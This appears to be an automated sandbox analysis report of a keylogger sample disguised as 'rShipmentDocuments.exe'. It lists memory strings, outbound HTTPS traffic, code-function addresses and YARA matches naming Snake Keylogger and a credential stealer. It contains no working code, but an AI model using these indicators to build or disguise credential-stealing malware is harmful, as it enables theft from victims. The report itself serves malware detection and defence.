                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003256000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: rShipmentDocuments.exe
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 0_2_0177E06C0_2_0177E06C
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 0_2_058D95180_2_058D9518
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 0_2_058DA8B00_2_058DA8B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 0_2_058DA8C00_2_058DA8C0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3D2789_2_02A3D278
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A353629_2_02A35362
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3A0889_2_02A3A088
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A371189_2_02A37118
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3C1489_2_02A3C148
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3C7389_2_02A3C738
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3C4689_2_02A3C468
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3CA089_2_02A3CA08
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A369B09_2_02A369B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3E9889_2_02A3E988
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3CFAA9_2_02A3CFAA
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3CCD89_2_02A3CCD8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A329E09_2_02A329E0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3F9619_2_02A3F961
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A3E97A9_2_02A3E97A
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_02A33E099_2_02A33E09
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F9C189_2_068F9C18
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FFC689_2_068FFC68
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F22889_2_068F2288
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F1BA89_2_068F1BA8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FF3B89_2_068FF3B8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F93289_2_068F9328
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F0B309_2_068F0B30
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F50289_2_068F5028
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F29709_2_068F2970
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FE6A09_2_068FE6A0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FE6B09_2_068FE6B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FDE009_2_068FDE00
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FEF519_2_068FEF51
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FEF609_2_068FEF60
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FCCA09_2_068FCCA0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FDDFF9_2_068FDDFF
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F95489_2_068F9548
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FD5409_2_068FD540
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FD5509_2_068FD550
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FEAF89_2_068FEAF8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FE24A9_2_068FE24A
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FE2589_2_068FE258
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F22789_2_068F2278
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F8BA09_2_068F8BA0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FEB089_2_068FEB08
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F0B209_2_068F0B20
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F1B779_2_068F1B77
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FD0E99_2_068FD0E9
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FD0F89_2_068FD0F8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F00079_2_068F0007
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FF8029_2_068FF802
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F50189_2_068F5018
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FF8109_2_068FF810
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F00409_2_068F0040
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FD9999_2_068FD999
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068FD9A89_2_068FD9A8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_0094E06C10_2_0094E06C
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_04CE951810_2_04CE9518
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_04CEA8C010_2_04CEA8C0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_04CEA8B010_2_04CEA8B0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069CC2E010_2_069CC2E0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C199810_2_069C1998
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C66D010_2_069C66D0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C466010_2_069C4660
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C4ED010_2_069C4ED0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C4A9810_2_069C4A98
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C4A8810_2_069C4A88
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C1A4A10_2_069C1A4A
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C6B0810_2_069C6B08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C198910_2_069C1989
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303536216_2_03035362
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303D27816_2_0303D278
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303711816_2_03037118
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303C14616_2_0303C146
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303A08816_2_0303A088
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303C73816_2_0303C738
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303C46816_2_0303C468
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303CA0816_2_0303CA08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303E98816_2_0303E988
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_030369A016_2_030369A0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303CFA916_2_0303CFA9
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303CCD816_2_0303CCD8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_03033AA116_2_03033AA1
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303F96116_2_0303F961
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303E97A16_2_0303E97A
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_030339EE16_2_030339EE
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_030329EC16_2_030329EC
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_03033E0916_2_03033E09
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D81E8016_2_06D81E80
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8F3B816_2_06D8F3B8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D817A016_2_06D817A0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D80B3016_2_06D80B30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D89C7016_2_06D89C70
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8FC6816_2_06D8FC68
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8502816_2_06D85028
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8954816_2_06D89548
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8296816_2_06D82968
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8EAF816_2_06D8EAF8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8E6B016_2_06D8E6B0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8E6AF16_2_06D8E6AF
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8E25816_2_06D8E258
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8E24916_2_06D8E249
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D81E7016_2_06D81E70
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8DE0016_2_06D8DE00
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D89BFB16_2_06D89BFB
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D88B9116_2_06D88B91
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8178F16_2_06D8178F
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D88BA016_2_06D88BA0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8EF5116_2_06D8EF51
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8EF6016_2_06D8EF60
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8EB0816_2_06D8EB08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8932816_2_06D89328
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D80B2016_2_06D80B20
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8D0F816_2_06D8D0F8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8CCA016_2_06D8CCA0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8004016_2_06D80040
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8501F16_2_06D8501F
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8F81016_2_06D8F810
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8F80116_2_06D8F801
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8000716_2_06D80007
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8DDFF16_2_06D8DDFF
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8D99916_2_06D8D999
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8D9A816_2_06D8D9A8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8D55016_2_06D8D550
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D8D54016_2_06D8D540
                Source: rShipmentDocuments.exe, 00000000.00000002.1735749873.0000000007DB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000000.1674316077.0000000000F64000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1736191962.0000000009214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs rShipmentDocuments.exe
